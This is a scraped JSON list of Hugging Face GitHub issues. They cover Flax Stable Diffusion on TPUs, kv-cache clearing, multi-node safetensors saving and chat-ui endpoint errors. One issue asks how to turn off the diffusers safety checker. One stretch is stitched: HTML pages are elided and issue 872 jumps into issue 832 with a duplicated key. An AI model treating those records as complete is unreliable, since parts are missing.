"updated_at": "2024-10-14T18:25:55Z", "user": "ghost" }, { "repo": "huggingface/diffusers", "number": 9032, "title": "how to get the minimun working example of FlaxStableDiffusionPipeline in google colab with tpu runtime", "body": "### Describe the bug\n\nI try the code in google colab with tpu runtime\r\n```\r\n! 
python3 -m pip install -U diffusers[flax]\r\nimport diffusers, os\r\npipeline = diffusers.StableDiffusionPipeline.from_single_file('https://huggingface.co/chaowenguo/pal/blob/main/chilloutMix-Ni.safetensors')\r\npipeline.save_pretrained('chilloutMix', safe_serialization=False)\r\npipeline, params = diffusers.FlaxStableDiffusionPipeline.from_pretrained('./chilloutMix', from_pt=True, safety_checker=None)\r\n```\r\nI always get Your session crashed for an unknown reason. I want to get the mininum working example in google colab with tpu runtime\n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\ngoogle colab with tpu runtime\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9032", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-08-01T03:58:34Z", "updated_at": "2024-11-04T15:04:13Z", "user": "ghost" }, { "repo": "huggingface/diffusers", "number": 9031, "title": "how to disable safty_checker in FlaxStableDiffusionPipeline", "body": "### Describe the bug\n\n```\r\n! python3 -m pip install -U tensorflow-cpu\r\nimport diffusers, os\r\npipeline = diffusers.StableDiffusionPipeline.from_single_file('https://huggingface.co/chaowenguo/pal/blob/main/chilloutMix-Ni.safetensors')\r\npipeline.save_pretrained('chilloutMix', safe_serialization=False)\r\npipeline, params = diffusers.FlaxStableDiffusionPipeline.from_pretrained('./chilloutMix', from_pt=True)\r\n```\r\nI always complains\r\n```\r\nPipeline expected {'text_encoder', 'unet', 'scheduler', 'safety_checker', 'feature_extractor', 'vae', 'tokenizer'}, but only {'text_encoder', 'unet', 'scheduler', 'feature_extractor', 'vae', 'tokenizer'} were passed.\r\n```\r\nI want to know how to disable safety_checker in FlaxStableDiffusionPipeline\r\nI try:\r\npipeline, params = diffusers.FlaxStableDiffusionPipeline.from_pretrained('./chilloutMix', from_pt=True, safety_checker=None)\r\nNot working \n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\nkaggle tpu vm\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9031", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-08-01T03:48:27Z", "updated_at": "2024-10-13T15:03:54Z", "user": "ghost" }, { "repo": "huggingface/llm.nvim", "number": 106, "title": "How to use openai api?", "body": "I read the code, and it seems support real openai api. But When I set it up something is wrong.\r\nJust make sure if this supports open ai api? I mean realy openai api.", "url": "https://github.com/huggingface/llm.nvim/issues/106", "state": "closed", "labels": [], "created_at": "2024-07-31T23:51:42Z", "updated_at": "2024-10-18T13:49:11Z", "user": "4t8dd" }, { "repo": "huggingface/diffusers", "number": 9025, "title": "how to use FlaxStableDiffusionPipeline with from_single_file in kaggle tpu vm", "body": "### Describe the bug\n\nI have single safetensors file and work on diffusers.StableDiffusionPipeline.from_single_file\r\nNow I want to use FlaxStableDiffusionPipeline but there are not .from_single_file member function in FlaxStableDiffusionPipeline\r\nI need to\r\n```\r\npipeline = diffusers.StableDiffusionPipeline.from_single_file()\r\npipeline.save_pretrained('current')\r\npipeline, params = diffusers.FlaxStableDiffusionPipeline.from_pretrained('./current')\r\n```\r\nNow I get [Error no file named diffusion_flax_model.msgpack or diffusion_pytorch_model.bin found in directory ./current/vae.] there are just diffusion_pytorch_model.safetensors. 
what I should do to get diffusion_pytorch_model.bin from diffusion_pytorch_model.safetensors\n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\nkaggle tpu vm \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9025", "state": "closed", "labels": [ "bug" ], "created_at": "2024-07-31T10:44:48Z", "updated_at": "2024-08-01T03:59:51Z", "user": "ghost" }, { "repo": "huggingface/transformers.js", "number": 873, "title": "Absolute speaker diarization?", "body": "### Question\n\nI've just managed to integrate the new speaker diarization feature into my project. Very cool stuff. My goal is to let people record meetings, summarize them, and then also list per-speaker tasks. This seems to be a popular feature.\r\n\r\n\r\nOne thing I'm running into is that I don't feed Whisper a single long audio file. Instead I use VAD to feed it small chunks of live audio whenever someone speaks.\r\n\r\nHowever, as far as I can tell the speaker diarization only works \"relatively\", detecting speakers within a single audio file.\r\n\r\nIs there a way to let it detect and 'sort' the correct speaker over multiple audio files? Perhaps it could remember the 'audio fingerprints' of the speakers somehow?\r\n\r\n![record_meeting](https://github.com/user-attachments/assets/3142272f-efad-4766-9614-b996d3f4b080)\r\n", "url": "https://github.com/huggingface/transformers.js/issues/873", "state": "closed", "labels": [ "question" ], "created_at": "2024-07-30T15:09:23Z", "updated_at": "2024-08-12T12:12:07Z", "user": "flatsiedatsie" }, { "repo": "huggingface/transformers.js", "number": 872, "title": "Please provide extensive examples of how to use langchain...", "body": "Here's an example script I'm using, which I believes leverages the ```recursivecharactertextsplitter``` from Langchain. I'd love to replicate my vector db program to the extent I'm able using javascript within a browser but need more examples/help...\r\n\r\n```\r\n\r\n\r\n\r\n \r\n \r\n PDF Text Extraction with Overlapping Chunks\r\n \r\n \r\n\r\n\r\n

[two HTML example pages elided in extraction: \"PDF Text Extraction with Overlapping Chunks\" with an \"Extract Text from PDF\" button, and \"Transformers.js Retrieval Example\" with a \"Retrieve Relevant Passages\" button]\r\n\r\nThat URL is unresolved by the CDN.\r\n\r\nIs version 3 available on any CDN? If so what is the URL? If not is there an alternative to import from browser?\r\n",
    "url": "https://github.com/huggingface/transformers.js/issues/832",
    "url": "https://github.com/huggingface/transformers.js/issues/832",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-30T23:39:08Z",
    "updated_at": "2024-10-10T12:23:41Z",
    "user": "geoffroy-noel-ddh"
  },
  {
    "repo": "huggingface/transformers",
    "number": 31717,
    "title": "how to remove kv cache?",
    "body": "### Feature request\n\nWhen I use the generate() function of a language model for inference, the kv-cache is also stored in the GPU memory. Is there any way to clear this kv-cache before continuing to call generate()?\n\n### Motivation\n\nI have a lot of text to process, so I use a for loop to call generate(). To avoid OOM, I need to clear the kv-cache before the end of each loop iteration.\n\n### Your contribution\n\nnone",
    "url": "https://github.com/huggingface/transformers/issues/31717",
    "state": "closed",
    "labels": [
      "Feature request",
      "Generation",
      "Cache"
    ],
    "created_at": "2024-06-30T12:09:48Z",
    "updated_at": "2024-11-05T01:34:42Z",
    "user": "TuuSiwei"
  },
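A minimal sketch of the usual workaround for the kv-cache question above (transformers#31717): the `past_key_values` tensors go out of scope when `generate()` returns, but the CUDA caching allocator keeps the blocks until `torch.cuda.empty_cache()` is called. `gpt2` stands in for the real checkpoint.

```python
import gc
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

tok = AutoTokenizer.from_pretrained("gpt2")
model = AutoModelForCausalLM.from_pretrained("gpt2").to("cuda")

for text in ["first prompt", "second prompt"]:
    inputs = tok(text, return_tensors="pt").to("cuda")
    with torch.no_grad():
        out = model.generate(**inputs, max_new_tokens=32)
    print(tok.decode(out[0], skip_special_tokens=True))
    # Drop references to the cache-holding tensors, then return the
    # cached CUDA blocks to the driver before the next iteration.
    del out, inputs
    gc.collect()
    torch.cuda.empty_cache()
```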
  {
    "repo": "huggingface/accelerate",
    "number": 2904,
    "title": "How to merge Qlora FSDP weights with an LLM and save model.",
    "body": "",
    "url": "https://github.com/huggingface/accelerate/issues/2904",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-30T07:00:50Z",
    "updated_at": "2024-07-01T14:20:53Z",
    "user": "Minami-su"
  },
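For the QLoRA/FSDP merge question above (accelerate#2904), one common recipe once the adapter has been gathered into a normal PEFT checkpoint: reload the base model in half precision (not 4-bit, since LoRA deltas cannot be folded into quantized weights) and call `merge_and_unload()`. Paths here are hypothetical placeholders.

```python
import torch
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

base_id = "meta-llama/Llama-2-7b-hf"        # placeholder base model
adapter_dir = "outputs/qlora-adapter"        # placeholder adapter checkpoint

# Load the base weights in bf16 so the LoRA deltas can be folded in.
base = AutoModelForCausalLM.from_pretrained(base_id, torch_dtype=torch.bfloat16)
merged = PeftModel.from_pretrained(base, adapter_dir).merge_and_unload()

merged.save_pretrained("outputs/merged-model", safe_serialization=True)
AutoTokenizer.from_pretrained(base_id).save_pretrained("outputs/merged-model")
```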
  {
    "repo": "huggingface/transformers.js",
    "number": 830,
    "title": "Error while using the library in nextjs (app based route)",
    "body": "### Question\r\n\r\nHello \r\n\r\nI was going through the issues section to find out an solution for the issue i am facing.. I did tried some of the solutions provided by xenova but it seems like I am getting some wasm fallback error which I have no idea whats happening.. I doubt its on webpack but I wanted a clarity. \r\n\r\n\r\nThe error I see is like this while running `npm run dev`\r\n\r\n```\r\n \u2713 Compiled /api/openai in 1500ms (3656 modules)\r\nTypeError: Cannot read properties of undefined (reading 'create')\r\n    at constructSession (webpack-internal:///(rsc)/./node_modules/@xenova/transformers/src/models.js:436:39)\r\n    at async Promise.all (index 1)\r\n    at async BertModel.from_pretrained (webpack-internal:///(rsc)/./node_modules/@xenova/transformers/src/models.js:1007:20)\r\n    at async AutoModel.from_pretrained (webpack-internal:///(rsc)/./node_modules/@xenova/transformers/src/models.js:5026:20)\r\n    at async Promise.all (index 1)\r\n    at async loadItems (webpack-internal:///(rsc)/./node_modules/@xenova/transformers/src/pipelines.js:2838:5)\r\n    at async pipeline (webpack-internal:///(rsc)/./node_modules/@xenova/transformers/src/pipelines.js:2790:21)\r\n    at async HuggingFaceEmbedding.getExtractor (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/HuggingFaceEmbedding.js:37:30)\r\n    at async HuggingFaceEmbedding.getTextEmbedding (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/HuggingFaceEmbedding.js:44:27)\r\n    at async HuggingFaceEmbedding.getTextEmbeddings (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/types.js:30:31)\r\n    at async batchEmbeddings (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/types.js:61:32)\r\n    at async HuggingFaceEmbedding.getTextEmbeddingsBatch (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/types.js:40:16)\r\n    at async HuggingFaceEmbedding.transform (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/types.js:44:28)\r\n    at async VectorStoreIndex.getNodeEmbeddingResults (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/indices/vectorStore/index.js:474:17)\r\n    at async VectorStoreIndex.insertNodes (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/indices/vectorStore/index.js:571:17)\r\n    at async VectorStoreIndex.buildIndexFromNodes (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/indices/vectorStore/index.js:486:9)\r\n    at async VectorStoreIndex.init (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/indices/vectorStore/index.js:436:13)\r\n    at async VectorStoreIndex.fromDocuments (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/indices/vectorStore/index.js:514:16)\r\n    at async getOpenAIModelRequest (webpack-internal:///(rsc)/./src/actions/openai.ts:62:23)\r\n    at async POST (webpack-internal:///(rsc)/./src/app/api/openai/route.ts:11:21)\r\n    at async /Users/jino.jose/rakuten/git/rr-services-version-dashboard/node_modules/next/dist/compiled/next-server/app-route.runtime.dev.js:6:63809\r\n    at async eU.execute (/Users/jino.jose/rakuten/git/rr-services-version-dashboard/node_modules/next/dist/compiled/next-server/app-route.runtime.dev.js:6:53964)\r\n    at async eU.handle (/Users/jino.jose/rakuten/git/rr-services-version-dashboard/node_modules/next/dist/compiled/next-server/app-route.runtime.dev.js:6:65062)\r\n    at async doRender (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:1333:42)\r\n    at async 
cacheEntry.responseCache.get.routeKind (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:1555:28)\r\n    at async DevServer.renderToResponseWithComponentsImpl (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:1463:28)\r\n    at async DevServer.renderPageComponent (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:1856:24)\r\n    at async DevServer.renderToResponseImpl (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:1894:32)\r\n    at async DevServer.pipeImpl (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:911:25)\r\n    at async NextNodeServer.handleCatchallRenderRequest (/opt/homebrew/lib/node_modules/next/dist/server/next-server.js:271:17)\r\n    at async DevServer.handleRequestImpl (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:807:17)\r\n    at async /opt/homebrew/lib/node_modules/next/dist/server/dev/next-dev-server.js:331:20\r\n    at async Span.traceAsyncFn (/opt/homebrew/lib/node_modules/next/dist/trace/trace.js:151:20)\r\n    at async DevServer.handleRequest (/opt/homebrew/lib/node_modules/next/dist/server/dev/next-dev-server.js:328:24)\r\n    at async invokeRender (/opt/homebrew/lib/node_modules/next/dist/server/lib/router-server.js:163:21)\r\n    at async handleRequest (/opt/homebrew/lib/node_modules/next/dist/server/lib/router-server.js:342:24)\r\n    at async requestHandlerImpl (/opt/homebrew/lib/node_modules/next/dist/server/lib/router-server.js:366:13)\r\n    at async Server.requestListener (/opt/homebrew/lib/node_modules/next/dist/server/lib/start",
    "url": "https://github.com/huggingface/transformers.js/issues/830",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-29T15:00:09Z",
    "updated_at": "2025-02-10T02:00:25Z",
    "user": "rr-jino-jose"
  },
  {
    "repo": "huggingface/candle",
    "number": 2294,
    "title": "How to get raw tensor data?",
    "body": "I am trying to implement an adaptive avg pool in candle. However, I guess my implementation will require an API to get the raw data/storage (storaged in plain/flatten array format).\r\nWondering if there is such an API for that?\r\n\r\nThanks!",
    "url": "https://github.com/huggingface/candle/issues/2294",
    "state": "open",
    "labels": [],
    "created_at": "2024-06-28T19:19:45Z",
    "updated_at": "2024-06-28T21:51:57Z",
    "user": "WenheLI"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8730,
    "title": "Implementation of DDIM, why taking Xt and (t-1) as input?",
    "body": "### Describe the bug\n\nI have tried to infer a diffusion model with DDIM with the number of timesteps = 10 and maximize timesteps as 1000. \r\n\r\nI have printed the t in the for-loop, and the result is 901, 801, 801, 701, 601, 501, 401, 301, 201, 101, 1. It's really weird to me why 801 appears two times, and why we start from t=901 instead of t=1000. If we use t=901, we are trying to input x_1000 (the pure noise) and  t_901 to the noise predictor, right? It seems weird because when we train the diffusion model, we feed (x_t, t). I mean, the timestep t should correspond to the version of images x_t. \r\n\r\nI think the implementation may be right and some of my thoughts are wrong. Please kindly tell me the reason. Thank you!!!\n\n### Reproduction\n\nJust add a print in the forward for loop in DDIMPipeline.\n\n### Logs\n\n_No response_\n\n### System Info\n\nI believe this problem is not relevant to the system info.\n\n### Who can help?\n\n@yiyixuxu",
    "url": "https://github.com/huggingface/diffusers/issues/8730",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2024-06-28T18:45:55Z",
    "updated_at": "2024-07-01T17:24:49Z",
    "comments": 1,
    "user": "EPIC-Lab-sjtu"
  },
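The timestep pattern asked about in diffusers#8730 falls out of the scheduler's "leading" spacing arithmetic rather than a bug: the grid is spaced from 0, reversed, and shifted by `steps_offset`, so sampling starts at 901 rather than 999 (the duplicated 801 in the report is presumably a logging artifact). A small reproduction of that arithmetic:

```python
import numpy as np

num_train_timesteps = 1000
num_inference_steps = 10
steps_offset = 1  # default in many Stable Diffusion scheduler configs

# "leading" timestep spacing, as used by DDIM-style schedulers:
step_ratio = num_train_timesteps // num_inference_steps
timesteps = (np.arange(0, num_inference_steps) * step_ratio).round()[::-1].copy()
timesteps += steps_offset
print(timesteps)  # [901 801 701 601 501 401 301 201 101   1]
```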
  {
    "repo": "huggingface/safetensors",
    "number": 490,
    "title": "How to save model checkpoint from a distributed training from multiple nodes?",
    "body": "Hello, \r\n\r\nWhen I use accelerator and deepspeed Zero3 to train the model in one node with 8 GPUs, the following code smoothly saves the model checkpoint\r\n```\r\nds_state_dict = model._zero3_consolidated_16bit_state_dict() # here model is sharded \r\n\r\nif self.accelerator.is_main_process:\r\n    save_file(ds_state_dict, f\"{output_dir}/full_model.safetensors\")\r\n```\r\nHowever, when I move the code to two nodes with each node 8 GPUs, this code does not work.\r\nThe error is like:\r\n\r\n```Some NCCL operations have failed or timed out. Due to the asynchronous nature of CUDA kernels, subsequent GPU operations might run on corrupted/incomplete data.```\r\n\r\nThen I thought maybe I should not call main process only because there are two nodes, so I call the local rank 0 to save\r\n```\r\nds_state_dict = model._zero3_consolidated_16bit_state_dict() # here model is sharded \r\n\r\nif self.accelerator.local_process_index == 0:\r\n    save_file(ds_state_dict, f\"{output_dir}/full_model.safetensors\")\r\n\r\n```\r\n\r\nAnd the error becomes:\r\n```\r\nsave_file(ds_state_dict, f\"{output_dir}/full_model.safetensors\")\r\n  File \"/opt/conda/lib/python3.10/site-packages/safetensors/torch.py\", line 284, in save_file\r\n    serialize_file(_flatten(tensors), filename, metadata=metadata)\r\n  File \"/opt/conda/lib/python3.10/site-packages/safetensors/torch.py\", line 457, in _flatten\r\n    raise ValueError(f\"Expected a dict of [str, torch.Tensor] but received {type(tensors)}\")\r\nValueError: Expected a dict of [str, torch.Tensor] but received \r\n\r\n```\r\nI am not sure in this case, what is the right way to use safetensors to save?",
    "url": "https://github.com/huggingface/safetensors/issues/490",
    "state": "closed",
    "labels": [
      "Stale"
    ],
    "created_at": "2024-06-28T04:59:45Z",
    "updated_at": "2024-07-31T11:46:06Z",
    "user": "Emerald01"
  },
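For safetensors#490 above: DeepSpeed's `_zero3_consolidated_16bit_state_dict()` is a collective call, so every rank must enter it, yet it only materializes the dictionary on global rank 0 (other ranks receive `None`, which is what the `Expected a dict ... received` error on local rank 0 of the second node points to). A sketch assuming `model` is the DeepSpeed engine and `accelerator` is the Accelerate object from the question:

```python
from safetensors.torch import save_file

# Collective: all 16 ranks must call this together, even though only
# global rank 0 gets the assembled state dict back (others get None).
ds_state_dict = model._zero3_consolidated_16bit_state_dict()

# Save from the single global main process, not each node's local rank 0.
if accelerator.is_main_process:
    save_file(ds_state_dict, f"{output_dir}/full_model.safetensors")

accelerator.wait_for_everyone()  # keep the other ranks from racing ahead
```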
  {
    "repo": "huggingface/diffusers",
    "number": 8728,
    "title": "Using `torchsde.BrownianInterval` instead of `torchsde.BrownianTree` in class `BatchedBrownianTree`",
    "body": "**Is your feature request related to a problem? Please describe.**\r\nWhen I was doing some optimization for my pipeline, i found that the BrownianTree somehow took a bit more time.\r\n\r\n**Describe the solution you'd like.**\r\nI further dig into torchsde document, and found that they encouraged to use `BrownianInterval` to have best benefits for underlying structure utilization. The `BrownianTree` is actually just an abstraction layer of the `BrownianInterval` and as we all know, python function calls take time!\r\n\r\nCode:\r\n```\r\n#diffusers/src/diffusers/schedulers/scheduling_dpmsolver_sde.py:41\r\nself.trees = [torchsde.BrownianTree(t0, w0, t1, entropy=s, **kwargs) for s in seed]\r\n\r\n# Modified\r\nself.trees = [torchsde.BrownianInterval(t0, t1, size=w0.shape, dtype=w0.dtype, device=w0.device, cache_size=None, entropy=s, **kwargs) for s in seed]\r\n```\r\n\r\n**Additional context.**\r\n[torchsde doc link](https://github.com/google-research/torchsde/blob/master/DOCUMENTATION.md)",
    "url": "https://github.com/huggingface/diffusers/issues/8728",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-28T04:33:55Z",
    "updated_at": "2024-09-12T08:46:54Z",
    "comments": 5,
    "user": "dianyo"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 826,
    "title": "Support for GLiNER models?",
    "body": "### Question\n\nis there a reason why models from the GLiNER family can't be supported?\r\n\r\nI see they use a specialized library, does it take a lot of code to make them work?",
    "url": "https://github.com/huggingface/transformers.js/issues/826",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-28T01:54:37Z",
    "updated_at": "2024-10-04T07:59:16Z",
    "user": "Madd0g"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8721,
    "title": "how to unload a pipeline",
    "body": "how to unload a pipeline and release the gpu memory",
    "url": "https://github.com/huggingface/diffusers/issues/8721",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-27T10:04:39Z",
    "updated_at": "2024-07-02T14:40:39Z",
    "user": "nono909090"
  },
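The unload question above (diffusers#8721) is usually answered with the same pattern: drop every Python reference to the pipeline, collect, then release the cached CUDA blocks. A minimal sketch:

```python
import gc
import torch
from diffusers import StableDiffusionPipeline

pipe = StableDiffusionPipeline.from_pretrained(
    "runwayml/stable-diffusion-v1-5", torch_dtype=torch.float16
).to("cuda")
image = pipe("a photo of an astronaut").images[0]

# Delete the only reference to the pipeline, then free GPU memory.
del pipe
gc.collect()
torch.cuda.empty_cache()
```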
  {
    "repo": "huggingface/transformers.js",
    "number": 825,
    "title": "Are there any examples on how to use paligemma model with transformer.js",
    "body": "### Question\n\nFirst of all, thanks for this amazing library! \r\n\r\nSo my questions is, I happened to see this model available on transformers.js:\r\nhttps://huggingface.co/Xenova/paligemma-3b-mix-224\r\n\r\nBut unfortunately I can't find any example on how to run the `image-text-to-text` pipeline. Are there are resources you could kindly point me to? Thanks in advance! \ud83d\ude4f\ud83c\udffb ",
    "url": "https://github.com/huggingface/transformers.js/issues/825",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-27T09:49:22Z",
    "updated_at": "2024-06-29T02:39:27Z",
    "user": "alextanhongpin"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 294,
    "title": "after training using lerobot framework\uff0chow to infer the trained policy directly in real environment(ep. aloha code)? i have not found a solution yet",
    "body": "### System Info\n\n```Shell\nos ubuntu20.04,\n```\n\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nnot yet\n\n### Expected behavior\n\nhow to directly eval the policy trained by lerobot in aloha ?",
    "url": "https://github.com/huggingface/lerobot/issues/294",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "robots",
      "stale"
    ],
    "created_at": "2024-06-27T03:16:19Z",
    "updated_at": "2025-10-23T02:29:25Z",
    "user": "cong1024"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1312,
    "title": "[v0.9.1] Error: \"Cannot resolve directory $env\"",
    "body": "## Issue\r\n\r\nFor all client-side components, I get this:\r\n\r\n```\r\n\"Cannot resolve directory $env\"\r\n```\r\n\r\n\"image\"\r\n\r\n\"image\"\r\n\r\n\r\nThis issue prevents a Docker run, because PUBLIC_ASSETS is not found.\r\n\r\n@nsarrazin Please help.\r\n",
    "url": "https://github.com/huggingface/chat-ui/issues/1312",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-26T13:24:42Z",
    "updated_at": "2024-06-26T15:14:48Z",
    "comments": 2,
    "user": "adhishthite"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1311,
    "title": "400 (no body) trying to reach openai compatible server",
    "body": "Hi everyone,\r\n\r\nI have the following setup (containers are on the same device):\r\n- Container 1: Nvidia NIM (openai-compatible) with Llama3 8B Instruct, port 8000;\r\n- Container 2: chat-ui, port 3000.\r\n\r\nThis is the content of the `.env` file:\r\n```\r\nMONGODB_URL=mongodb://localhost:27017\r\nMONGODB_DB_NAME=chat-ui\r\nMODELS=`[{\"name\":\"Llama3-8B-Instruct\",\"id\":\"Llama3-8B-Instruct\",\"endpoints\":[{\"type\":\"openai\",\"baseURL\":\"http://192.168.120.240:8000/v1\",\"extraBody\":{\"repetition_penalty\":1.1}}]}]`\r\nLOG_LEVEL=debug\r\nALLOW_INSECURE_COOKIES=true\r\n```\r\n\r\nAnd this is the error I get when I try to run inference from browser:\r\n\r\n```\r\n{\"level\":50,\"time\":1719403859826,\"pid\":31,\"hostname\":\"592d634d7447\",\"err\":{\"type\":\"BadRequestError\",\"message\":\"400 status code (no body)\",\"stack\":\"Error: 400 status code (no body)\\n    at APIError.generate (file:///app/build/server/chunks/index-3aabce5f.js:4400:20)\\n    at OpenAI.makeStatusError (file:///app/build/server/chunks/index-3aabce5f.js:5282:25)\\n    at OpenAI.makeRequest (file:///app/build/server/chunks/index-3aabce5f.js:5325:30)\\n    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\\n    at async file:///app/build/server/chunks/models-e8725572.js:98846:36\\n    at async generateFromDefaultEndpoint (file:///app/build/server/chunks/index3-2417d430.js:213:23)\\n    at async generateTitle (file:///app/build/server/chunks/_server.ts-2c825ade.js:213:10)\\n    at async generateTitleForConversation (file:///app/build/server/chunks/_server.ts-2c825ade.js:177:19)\",\"status\":400,\"headers\":{\"content-length\":\"1980\",\"content-type\":\"application/json\",\"date\":\"Wed, 26 Jun 2024 12:10:59 GMT\",\"server\":\"uvicorn\"}},\"msg\":\"400 status code (no body)\"}\r\nBadRequestError: 400 status code (no body)\r\n    at APIError.generate (file:///app/build/server/chunks/index-3aabce5f.js:4400:20)\r\n    at OpenAI.makeStatusError (file:///app/build/server/chunks/index-3aabce5f.js:5282:25)\r\n    at OpenAI.makeRequest (file:///app/build/server/chunks/index-3aabce5f.js:5325:30)\r\n    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n    at async file:///app/build/server/chunks/models-e8725572.js:98846:36\r\n    at async generate (file:///app/build/server/chunks/_server.ts-2c825ade.js:426:30)\r\n    at async textGenerationWithoutTitle (file:///app/build/server/chunks/_server.ts-2c825ade.js:487:3) {\r\n  status: 400,\r\n  headers: {\r\n    'content-length': '543',\r\n    'content-type': 'application/json',\r\n    date: 'Wed, 26 Jun 2024 12:10:59 GMT',\r\n    server: 'uvicorn'\r\n  },\r\n  request_id: undefined,\r\n  error: undefined,\r\n  code: undefined,\r\n  param: undefined,\r\n  type: undefined\r\n}\r\n```\r\n\r\nIs there something wrong with the .env file, or is Nvidia NIM simply not supported for some strange reason?",
    "url": "https://github.com/huggingface/chat-ui/issues/1311",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-26T12:34:44Z",
    "updated_at": "2024-07-22T13:03:18Z",
    "comments": 2,
    "user": "edesalve"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8710,
    "title": "Add PAG support to SD1.5",
    "body": "We recently integrated PAG into diffusers! See this PR [here] (https://github.com/huggingface/diffusers/pull/7944) we added PAG to SDXL\r\n\r\nwe also want to add PAG support to SD1.5 pipelines! we will need:\r\n\r\n- [x] StableDiffusionPAGPipeline (assigned to @shauray8, PR https://github.com/huggingface/diffusers/pull/8725)\r\n- [ ] StableDiffusionPAGImg2ImgPipeline https://github.com/huggingface/diffusers/pull/9463\r\n- [ ] StableDiffusionPAGInpaintPipeline\r\n- [ ] StableDiffusionControlNetPAGInpaintPipeline (https://github.com/huggingface/diffusers/pull/8875)\r\n- [x] StableDiffusionControlNetPAGPipeline (assigned to @tuanh123789 )\r\n- [ ] StableDiffusionControlNetPAGImg2ImgPipeline (assigned to @Bhavay-2001 https://github.com/huggingface/diffusers/pull/8864)\r\n\r\n1. You should put it under the [pag folder](https://github.com/huggingface/diffusers/tree/main/src/diffusers/pipelines/pag)\r\n2. you can use the implementation of SDXL PAG pipelines as a reference (see this PRhttps://github.com/huggingface/diffusers/pull/7944 and you can find all the sdxl pag pipelines here https://github.com/huggingface/diffusers/tree/main/src/diffusers/pipelines/pag)\r\n3. you need to add AutoPipeline so that you can use this API to create it\r\n    ```python\r\n       AutoPipelineForImage2Image.from_pretrained(repo_id, controlnet=controlnet, enable_pag=True ...)\r\n   ```\r\n4. tests and docs \r\n\r\nIf you are interested in working on this, Let me know which pipeline(s) you want to work on:) ",
    "url": "https://github.com/huggingface/diffusers/issues/8710",
    "state": "closed",
    "labels": [
      "good first issue",
      "help wanted",
      "contributions-welcome"
    ],
    "created_at": "2024-06-26T08:23:17Z",
    "updated_at": "2024-10-09T20:40:59Z",
    "comments": 17,
    "user": "yiyixuxu"
  },
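As a usage illustration for the PAG task list above, mirroring the AutoPipeline API the issue quotes: a sketch assuming a diffusers release that ships the PAG pipelines, where `pag_scale` sets the strength of the perturbed-attention guidance.

```python
import torch
from diffusers import AutoPipelineForText2Image

pipe = AutoPipelineForText2Image.from_pretrained(
    "stabilityai/stable-diffusion-xl-base-1.0",
    enable_pag=True,            # routes to the PAG variant of the pipeline
    torch_dtype=torch.float16,
).to("cuda")

image = pipe(
    "an insect robot preparing a delicious meal",
    guidance_scale=7.0,
    pag_scale=3.0,              # perturbed-attention guidance strength
).images[0]
image.save("pag_example.png")
```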
  {
    "repo": "huggingface/chat-ui",
    "number": 1309,
    "title": "\"404 Resource Not Found\" when using Azure OpenAI model endpoint",
